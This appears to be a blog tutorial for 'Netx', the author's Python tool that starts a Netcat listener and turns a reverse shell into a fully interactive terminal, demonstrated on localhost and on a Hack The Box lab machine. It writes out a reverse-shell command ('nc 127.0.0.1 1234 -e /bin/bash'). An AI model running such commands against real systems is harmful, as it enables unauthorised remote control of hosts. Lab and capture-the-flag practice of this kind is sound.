INTRO
I am back with a new Python script. In this tutorial, we will try to gain interactive shell access without typing any command on the remote host. I will leave it to my script. we will try to see what my script is actually doing. we will do the same manually. you can tell me about some errors and bugs you faced while using the script. you can also donate me via Paytm (+91 9828654788). Netx has some extraordinary features which make it different from any other script. by the way, there is no such script available like Netx. and that is why I thought to make this Python script. I know that it would be lot better if it was a Shell script. but I don’t like to write such long scripts in Shell scripting.
Requirements
• Linux machine (Remote host)
• Netcat
• Kali Linux (Attacker, recommended)
• Python3
Honestly, I have never used this script on any other Linux distribution instead of Kali Linux. But you can try it on other Linux distributions. and please tell me if you encounter any error.
SCRIPT
First, download this script on your local system via Git. type this command:
git clone https://github.com/luckythandel/netx.git
You can also visit the GitHub page to see screenshots and more detail for Netx. and I have released a binary file too. you can download it from Netx GitHub page.
After downloading this on your Linux, install the requirements before running it. type this command:
pip3 install -r requirements.txt
Now the script is ready to run. let’s see what we have with -h flag. type this command:
python3 netx.py -h
Screenshot
I have just put the -p flag to define a port on which the Netcat listener will be started.
let’s run it without any flag and see what happens. type this command:
python3 netx.py
Screenshot:
look, it is asking for the port when I didn’t use the -p flag. actually, it is programmed that way. the port_define function takes care of it.
Screenshot:
Let’s run it with -p flag. type this command:
python3 netx.py -p 1234
Screenshot:
So, the listener is started on a defined port. and obviously you can choose another port. now let’s send it a request. I am running this on my localhost. so, I will use 127.0.0.1 as IP. type this command:
nc 127.0.0.1 1234 -e /bin/bash
Screenshot:
I used another account so you may able to see the difference between real shell and the shell that we want to get.
We can see two options:
“Y” : Let You Handle Commands
“N” : Let The Script Handles Commands
If you want to handle every command before running this, type “Y”. or you can choose “N” to do everything automatically. let’s select “Y’ first.
Screenshot:
Select python2 or python3. it can be useful when the Remote host doesn’t have some python version.
lets select python3, type 2.
Screenshot:
Type “Y”. but if you choose “N”, it will let you interact with shell without running the shown command.
Screenshot:
choose “Y”. and it will ask you for the terminal type.
Screenshot:
But this time you can choose “n” only if you running it on your local network.
Screenshot:
and you will see that you have a fully interactive shell. you can use arrow keys and clear terminal and some other stuff.
Screenshot
But let’s use it on an HTB machine instead of using it on our local system. I will not spoil anything. and this time we will let the script handle everything.
So, let’s use Netcat first just to be sure that the shell is not interactive. I have started a listener on port 1234. and after executing my payload to that machine, we have some response.
Screenshot:
As you can see this ugly shell we just got from the Box. Now let’s use Netx. but as I said I will let the script handle everything this time.
Screenshot:
Now when I hit enter, it will take some time to run commands properly. after running some commands, it will ask for you to change the terminal size. let me show you what does that means. well if you type “n” not to change the terminal size. you will see the output like this:
size of shell will be matched with your default terminal size in which it literally opens. but if you want to change the terminal size you can type “Y”.
Now let’s open nano and see if we have changed the size of the terminal or not.
Screenshot:
By the way, it also asks for changing the user that you may wanna use after getting an interactive shell. it will ask you for user after terminal size.
Screenshot:
Well, that what I created for you guys. hope you will consider using it in the future. and by the way, please tell me what else should I create with python. and of course, I will do it free but I will take some time.
Thanks For Visiting.
